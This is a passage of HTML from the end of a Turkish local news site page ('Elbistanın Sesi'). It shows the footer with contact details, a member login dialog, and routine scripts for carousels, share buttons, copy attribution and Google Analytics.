src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/1.jpg&w=165&h=388&q=90" width="165" height="388" style="width:165px;height: 388px;border:0" alt="banner58" /></a></p> </div> </div> <!-- FOOTER --> <div id="siteFooter" class="footer"> <div class="row-fluid"> <div class="container center"> <div class="span4"> <div>Copyright © 2017 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div> <div class="footer-social"> <a href="http://facebook.com/elbistaninsesi" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a> <a href="http://twitter.com/#" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a> <a href="#" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/google_circle-32.png" alt="GOOGLE PLUS"></a> <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a> </div> </div> <div class="span4 text-center"> <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Hastane güvenlik görevlisi olanların isimleri" /></a></div> </div> <div class="span4"> <p><center> 0 (344) 415 04 15 <br> gazete@elbistaninsesi.com <br>Kızılcaoba Mah. Kışla Cad. 19/1</center> </p> <p class="site-info glyphicons earphone">0 (344) 415 04 15</p> </div> </div> </div> <div id="footer-alt" class="row-fluid"> <div class="container center"> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/sitene-ekle.html" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div> </div> </div> </div> <div class="row-fluid"> <div class="container center"> <div class="span12 text-center"> <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p> <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim">TE Bilişim</a></p> </div> </div> </div> <div id="top" class="btn btn-inverse">Yukarı Çık</div> </div> <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Üye Girişi</h3> </div> <div class="modal-body"> <form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fguncel%2Fhastane-guvenlik-gorevlisi-olanlarin-isimleri-h38142.html" method="post"> <div class="control-group"> <label class="control-label" for="inputName">Kullanıcı Adı</label> <div class="controls"> <input id="inputName" value="" name="kullanici" type="text" placeholder="Kullanıcı Adı" required> </div> </div> <div class="control-group"> <label class="control-label" for="inputPassword">Şifre</label> <div class="controls"> <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required> </div> </div> <div class="control-group"> <div class="controls"> <button type="submit" class="btn btn-info">Giriş Yap</button> </div> </div> </form> </div> <div class="modal-footer"> <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a> <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a> <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button> </div> </div> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/getshares.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.elevateZoom-3.0.8.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system-min.js"></script> <script type="text/javascript">	new UISearch( document.getElementById( 'sb-search' ) );	$(function(){	});	$("#comment_list .text").pKisalt();	var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML;	var gsSpace = ' ';	var gsUrl = location.href;	new GetShare({ root: $(".gs-facebook"), network: "facebook", share: { }	});	new GetShare({ root: $(".gs-twitter"), network: "twitter", share: { message:gsTitle+gsSpace+gsUrl }	});	new GetShare({ root: $(".gs-google"), network: "googleplus", share: { }	});	new GetShare({ root: $(".gs-linkedin"), network: "linkedin", share: { }	});	jQuery('#anasayfayazar').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[4,4,4,4],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"off",	delay:4000,	speed:750	});	jQuery('#gununmansetleri').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[6,6,6,6],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"on",	delay:4000,	speed:750	});	$('#haber > .page-header').waypoint(function(direction) { $('#article-finished').toggleClass('hiding', direction === "up");	}, { offset: function() { return $.waypoints('viewportHeight') - $(this).height() - 750; }	});	function addLink() { var kisa_site_adi = "Elbistanın Sesi"; var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com"; var body_element = document.getElementsByTagName('body')[0]; var selection; selection = window.getSelection(); var pagelink = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi; var copytext = selection + pagelink; var newdiv = document.createElement('div'); newdiv.style.position='absolute'; newdiv.style.left='-99999px'; body_element.appendChild(newdiv); newdiv.innerHTML = copytext; selection.selectAllChildren(newdiv); window.setTimeout(function() { body_element.removeChild(newdiv); },0);	}	document.oncopy = addLink;	tebilisim('38142', 'haber', ''); </script> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', analitik_ga, 'auto'); ga('send', 'pageview'); </script> <!-- End Google Analytics --> </body> </html> 